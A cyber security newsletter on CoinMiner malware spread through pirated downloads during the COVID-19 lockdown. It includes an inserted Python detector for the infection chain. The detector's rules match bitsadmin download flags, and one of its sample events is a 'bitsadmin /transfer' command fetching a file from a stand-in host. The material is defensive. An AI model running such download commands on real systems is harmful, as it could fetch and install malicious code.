cyber security newsletter 3

COVID-19 Cyber Threats: CoinMiner Malware

By now a third of the global population is on lockdown due to the COVID-19 pandemic, which has left a lot of people trapped in their homes for more than a month.

Since March 2020, South Africa has experienced a 15% increase in Internet traffic across the network of SEACOM, the operator of one of South Africa’s major undersea fibre cables.1

There are many people who are unable to work from home, and even those who are able to have to keep their kids busy. Then there are evenings and weekends when everyone is stuck in their homes. You can clean the house, mow the lawn and play dress-up (or WWE SmackDown for those with boys) for only so long. For many, the television turned out to be a saving grace.

While some people are subscribed to legal streaming sites or DSTV, there are still a lot of people who get their movie and TV show content from torrents and pirate streaming sites, even though it is illegal and may subject a person to civil and criminal liability.

Cyber attackers have been using these torrents to distribute malware for a long time, but it is happening even more now, during the lockdown. Microsoft Security Intelligence discovered that some of this malware installs and runs CoinMiners.

Cryptocurrency miners (Coinminers) are programs that generate Bitcoin, Monero, Ethereum, or other cryptocurrencies.

CoinMiner malware uses the resources of someone else's computer or device (CPU, GPU, RAM, network bandwidth, and power) and forces it to mine cryptocurrencies.

Even though downloading pirated content is the main way users get infected with CoinMiner malware, there are a variety of other ways as well, such as fake updates and third-party software installers. When you download a movie, you may also be downloading ZIP files, which run a VBScript. “The VBScript runs a command line that uses BITSAdmin to download more components, including an AutoIT script, which decodes a second-stage DLL. The in-memory DLL then injects a coin-mining code into notepad.exe through process hollowing,” says Microsoft. 2
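The chain Microsoft describes leaves a recognisable process tree, so a defender can look for it in process-creation logs. The sketch below is an added example, not code from this newsletter or from Microsoft. It assumes events with `pid`, `ppid`, `image` and `cmdline` fields (modelled on process-creation telemetry), and the sample events and the exact tree shape are constructed for illustration.

```python
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # Windows hosts that run VBScript
BITS_DOWNLOAD_FLAGS = ("/transfer", "/addfile")  # bitsadmin switches that fetch files

def _name(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()

def ancestors(event, by_pid):
    """Yield the parents of `event`, nearest first, guarding against PID loops."""
    seen = set()
    parent = by_pid.get(event["ppid"])
    while parent and parent["pid"] not in seen:
        seen.add(parent["pid"])
        yield parent
        parent = by_pid.get(parent["ppid"])

def detect(events):
    """Return sorted (pid, rule) pairs for processes that fit the described chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        # Both rules only fire for processes that descend from a script host.
        if not any(_name(a["image"]) in SCRIPT_HOSTS for a in ancestors(e, by_pid)):
            continue
        name, cmd = _name(e["image"]), e["cmdline"].lower()
        if name == "bitsadmin.exe" and any(f in cmd for f in BITS_DOWNLOAD_FLAGS):
            findings.append((e["pid"], "bits-download-from-script"))
        elif name == "notepad.exe":
            # notepad.exe is the hollowing target named in the quote above.
            findings.append((e["pid"], "notepad-under-script-host"))
    return sorted(findings)

# Constructed sample events (not taken from a real incident).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\movie\play.vbs"'},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ..."},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 https://example.invalid/a.bin C:\Temp\a.bin"},
    {"pid": 230, "ppid": 200, "image": r"C:\Temp\a.exe", "cmdline": r"C:\Temp\a.exe b.au3"},
    {"pid": 240, "ppid": 230, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    # Benign: user opens a text file, and an admin lists BITS jobs.
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\notes.txt"},
    {"pid": 310, "ppid": 100, "image": r"C:\Windows\System32\bitsadmin.exe", "cmdline": "bitsadmin /list"},
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

Real logs reuse PIDs over time, so a production version would key processes on a unique process identifier or on PID plus start time rather than PID alone.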

While cybercriminals profit from this activity, victims have to suffer from lag, errors, system crashes, overheating issues, as well as increased electricity bills.

Indications that your computer is mining include high CPU and GPU usage, overheating, crashes, slow response times or unusual network activity. 3 Everyone should have a security solution on their computer and devices, and it needs to be active at all times.


Not sure whether your computer is secure?

Contact LAWtrust regarding systems and services that can assist in making you more secure while working from home.


Notes
1 Vermeulen, J. (2020, April 5). How much Internet traffic in South Africa has increased due to the coronavirus. https://mybroadband.co.za/news/internet/344937-how-much-internet-traffic-in-south-africa-has-increased-due-to-the-coronavirus.

 
2 Stahie, S. (2020, April 30). Pirated Movies Are Used to Distribute Malware. https://securityboulevard.com/2020/04/pirated-movies-are-used-to-distribute-malware/.

3 (2019, November 19). Protection against the Coinminer malware. https://support.norton.com/sp/en/us/home/current/solutions/v125881893.